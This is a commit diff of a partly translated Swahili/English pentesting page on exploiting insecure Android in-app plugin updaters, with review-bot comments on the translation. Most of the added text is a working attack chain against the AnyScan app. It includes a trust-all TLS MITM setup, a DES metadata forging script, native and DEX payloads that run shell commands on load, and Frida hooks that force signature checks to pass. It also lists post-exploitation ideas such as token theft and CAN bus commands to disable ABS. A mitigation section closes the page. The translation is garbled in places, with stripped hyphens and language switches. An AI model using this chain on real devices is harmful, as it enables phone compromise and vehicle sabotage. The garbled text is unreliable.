Translated ['src/mobile-pentesting/android-app-pentesting/insecure-in-ap

Translator 2025-08-27 04:09:28 +00:00
parent b811c3dc78
commit 4b5d2a7fb8


@ -1,16 +1,49 @@
# Insecure In-App Update Mechanisms Remote Code Execution via Malicious Plugins
# Mbinu zisizo salama za In-App Update Remote Code Execution via Malicious Plugins
{{#include ../../banners/hacktricks-training.md}}
Mifumo mingi ya programu za Android inatekeleza **“plugin” zao au “dynamic feature” channels za sasisho** badala ya kutumia Google Play Store. Wakati utekelezaji hauko salama, mshambuliaji anayeweza kukamata trafiki anaweza kutoa **msimbo wa asili usio na mipaka ambao utawekwa ndani ya mchakato wa programu**, na kusababisha Utekelezaji wa Msimbo wa K remote (RCE) kwenye simu na katika baadhi ya matukio kwenye kifaa chochote cha nje kinachodhibitiwa na programu (magari, IoT, vifaa vya matibabu …).
Programu nyingi za Android hufanya vyanzo vyao vya “plugin” au “dynamic feature” vya updates badala ya kutumia Google Play Store. Iwapo utekelezaji si salama, mshambuliaji anayeweza kuingilia au kubadilisha trafiki ya update anaweza kusambaza arbitrary native au Dalvik/ART code zitakazopakiwa ndani ya mchakato wa app, na kusababisha Remote Code Execution (RCE) kamili kwenye handset — na katika baadhi ya matukio kwenye kifaa chochote cha nje kinachodhibitiwa na app (cars, IoT, medical devices …).
Ukurasa huu unatoa muhtasari wa mnyororo wa udhaifu wa kweli uliopatikana katika programu ya uchambuzi wa magari ya Xtool **AnyScan** (v4.40.11 → 4.40.40) na kuufanya kuwa wa jumla ili uweze kukagua programu nyingine za Android na kutumia makosa ya usanidi wakati wa ushirikiano wa timu nyekundu.
Ukurasa huu unatoa muhtasari wa mnyororo wa udhaifu uliopatikana katika Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) na kunoa mbinu ili uweze kuauditi Android apps nyingine na weaponise mis-configuration wakati wa red-team engagement.
---
## 1. Kutambua TrustManager Isiyo Salama ya TLS
## 0. Ukaguzi wa haraka: je, app ina inapp updater?
1. Fanya decompile ya APK kwa kutumia jadx / apktool na pata safu ya mtandao (OkHttp, HttpUrlConnection, Retrofit…).
2. Tafuta **`TrustManager` ya kawaida** au `HostnameVerifier` inayotegemea kila cheti bila masharti:
Dalili za static za kutafuta katika JADX/apktool:
- Strings: "update", "plugin", "patch", "upgrade", "hotfix", "bundle", "feature", "asset", "zip".
- Endpoints za mtandao kama `/update`, `/plugins`, `/getUpdateList`, `/GetUpdateListEx`.
- Msaada wa crypto karibu na njia za update (DES/AES/RC4; Base64; JSON/XML packs).
- Dynamic loaders: `System.load`, `System.loadLibrary`, `dlopen`, `DexClassLoader`, `PathClassLoader`.
- Njia za unzip zinazoandika chini ya app-internal au external storage, kisha mara moja ku-load `.so`/DEX.
Runtime hooks za kuthibitisha:
```js
// Frida: log native and dex loading
Java.perform(() => {
const Runtime = Java.use('java.lang.Runtime');
const SystemJ = Java.use('java.lang.System');
const DexClassLoader = Java.use('dalvik.system.DexClassLoader');
SystemJ.load.overload('java.lang.String').implementation = function(p) {
console.log('[System.load] ' + p); return this.load(p);
};
SystemJ.loadLibrary.overload('java.lang.String').implementation = function(n) {
console.log('[System.loadLibrary] ' + n); return this.loadLibrary(n);
};
Runtime.load.overload('java.lang.String').implementation = function(p){
console.log('[Runtime.load] ' + p); return this.load(p);
};
DexClassLoader.$init.implementation = function(dexPath, optDir, libPath, parent) {
console.log(`[DexClassLoader] dex=${dexPath} odex=${optDir} jni=${libPath}`);
return this.$init(dexPath, optDir, libPath, parent);
};
});
```
---
## 1. Kutambua TrustManager isiyo salama ya TLS
1. Dekompaile APK kwa kutumia jadx / apktool na tafuta stack ya mitandao (OkHttp, HttpUrlConnection, Retrofit…).
2. Tafuta `TrustManager` au `HostnameVerifier` maalum ambao inaamini bila kuchunguza vyeti vyote:
```java
public static TrustManager[] buildTrustManagers() {
return new TrustManager[]{
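Review bot: terminology is inconsistent within this hunk for the same step: the new section 0 says `Fanya decompile ya APK kwa kutumia jadx / apktool na pata safu ya mtandao`, while the rewritten section 1 says `Dekompaile APK kwa kutumia jadx / apktool na tafuta stack ya mitandao`; pick one rendering (the `Fanya decompile ... safu ya mtandao` form reads more naturally) and use it in both places. The new heading `## 0. Ukaguzi wa haraka: je, app ina inapp updater?` has also lost the hyphen in `in-app` (the title line keeps `In-App`); restore it so the two agree.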
@ -22,25 +55,36 @@ public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
};
}
```
3. Ikiwa ipo, programu itakubali **cheti chochote cha TLS** → unaweza kuendesha **MITM proxy** wazi na cheti kilichojisajili mwenyewe:
3. Ikiwa ipo, programu itakubali cheti chochote cha TLS → unaweza kuendesha transparent MITM proxy kwa self-signed cert:
```bash
mitmproxy -p 8080 -s addon.py # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080 # on rooted device / emulator
```
## 2. Kurejesha Uhandisi wa Metadata ya Sasisho
Ikiwa TLS pinning imetekelezwa badala ya mantiki isiyo salama ya trust-all, angalia:
Katika kesi ya AnyScan, kila uzinduzi wa programu unachochea HTTPS GET kwa:
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
---
## 2. Reverse-Engineering ya metadata ya masasisho
Katika kesi ya AnyScan, kila uzinduzi wa app husababisha HTTPS GET kwa:
```
https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx
```
Mwili wa jibu ni **document ya XML** ambayo nodi za `<FileData>` zina **JSON iliyosimbwa kwa Base64, DES-ECB** inayoelezea kila plugin inayopatikana.
Mwili wa jibu ni hati ya XML ambapo node za `<FileData>` zina JSON iliyosimbwa kwa DES-ECB na iliyo Base64-encoded inayofafanua kila plugin inayopatikana.
Hatua za kawaida za uwindaji:
1. Pata utaratibu wa crypto (mfano `RemoteServiceProxy`) na urejeshe:
* algorithimu (DES / AES / RC4 …)
* njia ya uendeshaji (ECB / CBC / GCM …)
* funguo zilizowekwa kwa nguvu / IV (mara nyingi funguo za DES za bit 56 au funguo za AES za bit 128 katika constants)
2. Re-implementa kazi hiyo katika Python ili kufungua / kusimbia metadata:
Typical hunting steps:
1. Pata rotina ya crypto (e.g. `RemoteServiceProxy`) na upate:
- algoritimu (DES / AES / RC4 …)
- mode ya uendeshaji (ECB / CBC / GCM …)
- funguo zilizo hard-coded / IV (kawaida 56bit DES au 128bit AES konstanti)
2. Rudia kutekeleza function hiyo kwa Python ili ku-decrypt / ku-encrypt metadata:
```python
from Crypto.Cipher import DES
from base64 import b64decode, b64encode
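Review bot: `Typical hunting steps:` is left in English although the line it replaces (`Hatua za kawaida za uwindaji:`) was already Swahili; keep the Swahili caption rather than regressing it. In the same list, `kawaida 56bit DES au 128bit AES konstanti` has dropped the hyphens from `56-bit` / `128-bit` (the replaced line still carries the bit sizes intact as `bit 56` / `bit 128`); write `56-bit` and `128-bit` so the sizes are not read as run-together tokens.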
@ -55,9 +99,17 @@ def encrypt_metadata(plaintext: bytes) -> str:
cipher = DES.new(KEY, DES.MODE_ECB)
return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()
```
Maelezo yaliyoonekana porini (20232025):
- Metadata mara nyingi huwa JSON-within-XML au protobuf; sifre dhaifu na funguo za static ni za kawaida.
- Updaters nyingi zinakubali plain HTTP kwa ajili ya kupakua payload halisi hata kama metadata inakuja kupitia HTTPS.
- Plugins mara nyingi hu-unzip kwenye app-internal storage; baadhi bado hutumia external storage au legacy `requestLegacyExternalStorage`, kuruhusu cross-app tampering.
---
## 3. Tengeneza Plugin Mbaya
1. Chagua ZIP ya plugin halali yoyote na badilisha maktaba asilia na payload yako:
### 3.1 Njia ya native library (dlopen/System.load[Library])
1. Chagua ZIP yoyote ya plugin halali na badilisha native library na payload yako:
```c
// libscan_x64.so constructor runs as soon as the library is loaded
__attribute__((constructor))
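Review bot: the new heading `Maelezo yaliyoonekana porini (20232025)` has its year range collapsed into a single seven-digit number; the dash between 2023 and 2025 was stripped during translation. Write `(2023-2025)`. Otherwise the three bullets under it read consistently with the terminology used earlier in the file.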
@ -71,12 +123,37 @@ __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid(
$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so
$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
```
2. Sasisha metadata ya JSON ili `"FileName" : "PWNED.zip"` na `"DownloadURL"` ielekeze kwenye seva yako ya HTTP.
3. Fanya DES-encrypt + Base64-encode JSON iliyobadilishwa na uikopishe ndani ya XML iliyokamatwa.
2. Sasisha metadata ya JSON ili "FileName" : "PWNED.zip" na "DownloadURL" ziwe zinarejea kwenye HTTP server yako.
3. Fanya reencrypt + Base64encode kwa JSON iliyobadilishwa kisha ibandika tena ndani ya XML iliyokamatwa.
## 4. Toa Payload na mitmproxy
### 3.2 Njia ya plugin inayotegemea Dex (DexClassLoader)
`addon.py` mfano ambao *kimya* unabadilisha metadata ya asili:
Baadhi ya apps hupakua JAR/APK na hupakia code kupitia `DexClassLoader`. Tengeneza DEX hatari itakayotekelezwa wakati wa kupakia:
```java
// src/pwn/Dropper.java
package pwn;
public class Dropper {
static { // runs on class load
try {
Runtime.getRuntime().exec("sh -c 'id > /data/data/<pkg>/files/pwned' ");
} catch (Throwable t) {}
}
}
```
```bash
# Compile and package to a DEX jar
javac -source 1.8 -target 1.8 -d out/ src/pwn/Dropper.java
jar cf dropper.jar -C out/ .
d8 --output outdex/ dropper.jar
cd outdex && zip -r plugin.jar classes.dex # the updater will fetch this
```
Ikiwa lengo litaite `Class.forName("pwn.Dropper")` static initializer yako itaendesha; vinginevyo, kupitia reflection, orodhesha madarasa yaliyopakiwa kwa kutumia Frida kisha ita method iliyotolewa.
---
## 4. Wasilisha Payload na mitmproxy
`addon.py` mfano unaobadilisha metadata asilia bila kutambulika:
```python
from mitmproxy import http
MOD_XML = open("fake_metadata.xml", "rb").read()
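Review bot: the rewritten step 2 drops the inline-code formatting the replaced line had: `Sasisha metadata ya JSON ili "FileName" : "PWNED.zip" na "DownloadURL" ziwe zinarejea ...` should keep the backticks around `"FileName" : "PWNED.zip"` and `"DownloadURL"`, as in the old line, since these are literal JSON keys and values. Step 3 `Fanya reencrypt + Base64encode` has lost its hyphens and should read `re-encrypt + Base64-encode`. The new subsection `### 3.2` and the sentence after the bash block are consistent with the rest of the file.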
@ -89,36 +166,69 @@ MOD_XML,
{"Content-Type": "text/xml"}
)
```
Kimbia seva rahisi ya wavuti ili kuhifadhi ZIP yenye uharibifu:
Endesha web server rahisi ili ku-host ZIP/JAR ya hasidi:
```bash
python3 -m http.server 8000 --directory ./payloads
```
When the victim launches the app it will:
* fetch our forged XML over the MITM channel;
* decrypt & parse it with the hard-coded DES key;
* download `PWNED.zip` → unzip inside private storage;
* `dlopen()` the included *libscan_x64.so*, instantly executing our code **with the apps permissions** (camera, GPS, Bluetooth, filesystem, …).
- itachukua XML yetu iliyodanganywa kupitia chaneli ya MITM;
- decrypt & parse it with the hard-coded crypto;
- download `PWNED.zip` or `plugin.jar` → unzip inside private storage;
- load the included `.so` or DEX, instantly executing our code with the apps permissions (camera, GPS, Bluetooth, filesystem, …).
Because the plugin is cached on disk the backdoor **persists across reboots** and runs every time the user selects the related feature.
## 5. Wazo Baada ya Utekelezaji
* Pora vidakuzi vya kikao, tokens za OAuth, au JWTs zilizohifadhiwa na programu.
* Acha APK ya hatua ya pili na kuisakinisha kimya kimya kupitia `pm install` (programu tayari ina `REQUEST_INSTALL_PACKAGES`).
* Tumia vifaa vyovyote vilivyounganishwa katika hali ya AnyScan unaweza kutuma amri za **OBD-II / CAN bus** (fungua milango, zima ABS, nk.).
Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.
---
### Orodha ya Ugunduzi & Kupunguza (timu ya buluu)
## 4.1 Bypassing signature/hash checks (when present)
* KAMWE usisambaze toleo la uzalishaji lenye TrustManager/HostnameVerifier maalum inayozuia uthibitishaji wa cheti.
* Usipakue msimbo wa kutekeleza kutoka nje ya Google Play. Ikiwa *lazima*, sahihi kila plugin kwa ufunguo sawa wa **apkSigning v2** na thibitisha saini kabla ya kupakia.
* Badilisha crypto dhaifu/iliyowekwa kwa **AES-GCM** na ufunguo unaobadilika upande wa seva.
* Thibitisha uadilifu wa maktaba zilizopakuliwa (saini au angalau SHA-256).
If the updater validates signatures or hashes, hook verification to always accept attacker content:
```js
// Frida make java.security.Signature.verify() return true
Java.perform(() => {
const Sig = Java.use('java.security.Signature');
Sig.verify.overload('[B').implementation = function(a) { return true; };
});
// Less surgical (use only if needed): defeat Arrays.equals() for byte[]
Java.perform(() => {
const Arrays = Java.use('java.util.Arrays');
Arrays.equals.overload('[B', '[B').implementation = function(a, b) { return true; };
});
```
Pia zingatia ku-stub mbinu za vendor kama `PluginVerifier.verifySignature()`, `checkHash()`, au kupunguza/ku-shortcircuit mantiki ya gating ya update katika Java au JNI.
---
## Marejeleo
## 5. Nyuso nyingine za mashambulizi katika vipengele vya masasisho (20232025)
- Zip Slip path traversal wakati wa kutoa plugins: vitu hatarishi kama `../../../../data/data/<pkg>/files/target` vinaweza kuandika juu ya faili yoyote. Daima sanitisha njia za entry na tumia allowlists.
- External storage staging: ikiwa app inaandika archive kwenye external storage kabla ya kuipakia, app nyingine yoyote inaweza kuiharibu. Scoped Storage au internal app storage vinaepuka hili.
- Cleartext downloads: metadata kwa HTTPS lakini payload kwa HTTP → kubadilishana kwa MITM kwa urahisi.
- Incomplete signature checks: kulinganisha hash ya faili moja tu, si archive yote; kutoziunganisha saini na developer key; kukubali yoyote RSA key iliyopo ndani ya archive.
- React Native / Web-based OTA content: ikiwa native bridges zinaendesha JS kutoka OTA bila signing kali, utekelezaji wa code yoyote katika muktadha wa app unaweza kutokea (mf., flows zinazofanana na CodePush zisizo salama). Hakikisha detached update signing na verification kali.
---
## 6. Post-Exploitation Ideas
- Pora session cookies, OAuth tokens, au JWTs zilizo hifadhiwa na app.
- Angusha APK ya hatua ya pili na uitumie kimya kwa `pm install` ikiwa inawezekana (app zingine tayari zinaeleza `REQUEST_INSTALL_PACKAGES`).
- Tumia vibaya vifaa vyovyote vilivyounganishwa katika tukio la AnyScan unaweza kutuma amri yoyote ya OBDII / CAN bus (fungua milango, zima ABS, n.k.).
---
### Orodha ya Ugundaji na Kupunguza Hatari (blue team)
- Epuka dynamic code loading na outofstore updates. Prefer Playmediated updates. Ikiwa dynamic plugins ni sharti, zitenge kama bundles za data tu na weka executable code katika base APK.
- Tekeleza TLS ipasavyo: usitumie custom trustall managers; weka pinning pale inapowezekana na network security config iliyokazwa inayokataa trafiki ya cleartext.
- Usipakue executable code kutoka nje ya Google Play. Ikiwa lazima, tumia detached update signing (mf., Ed25519/RSA) na developerheld key na hakikisha kabla ya kuipakia. Unganisha metadata na payload (urefu, hash, version) na fail closed.
- Tumia crypto ya kisasa (AESGCM) na nonces kwa ujumbe kwa metadata; tosha hardcoded keys kutoka kwa clients.
- Thibitisha uadilifu wa archives zilizopakuliwa: hakiki saini inayofunika kila faili, au angalau hakiki manifest ya SHA256 hashes. Kataa faili za ziada/zisizojulikana.
- Hifadhi downloads katika appinternal storage (au scoped storage kwenye Android 10+) na tumia ruhusa za faili zinazozuia kuingiliwa na apps nyingine.
- Linda dhidi ya Zip Slip: normaliza na thibitisha zip entry paths kabla ya extraction; kata absolute paths au sehemu `..`.
- Fikiria Play “Code Transparency” ili wewe na watumiaji muweze kuthibitisha kwamba shipped DEX/native code inalingana na mlivyojenga (inaongeza usalama lakini haibadilishi APK signing).
---
## References
- [NowSecure Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/)
- [Android Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager)
- [Android Developers Dynamic Code Loading (risks and mitigations)](https://developer.android.com/privacy-and-security/risks/dynamic-code-loading)
{{#include ../../banners/hacktricks-training.md}}
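Review bot: the translation in this hunk is incomplete. Of the rewritten bullet list only the first item (`itachukua XML yetu iliyodanganywa kupitia chaneli ya MITM;`) is in Swahili; the next three (`decrypt & parse it with the hard-coded crypto;`, `download PWNED.zip or plugin.jar → unzip inside private storage;`, `load the included .so or DEX, ...`) and the following sentence `Because the plugin is cached on disk the backdoor persists across reboots ...` stay in English. The new headings `## 4.1 Bypassing signature/hash checks (when present)`, `## 6. Post-Exploitation Ideas` and `## References` are English as well, and `## References` replaces a line that was already Swahili (`## Marejeleo`); the line `If the updater validates signatures or hashes, hook verification to always accept attacker content:` is untranslated too. Translate these to match the rest of the page. Hyphens and dashes have also been stripped throughout the new text: `20232025`, `outofstore`, `Playmediated`, `AESGCM`, `hardcoded`, `SHA256`, `appinternal`, `developerheld` and `OBDII` should read `2023-2025`, `out-of-store`, `Play-mediated`, `AES-GCM`, `hard-coded`, `SHA-256`, `app-internal`, `developer-held` and `OBD-II`; this looks like non-ASCII hyphens being dropped by the translation step and is worth a pass over the whole file before merging.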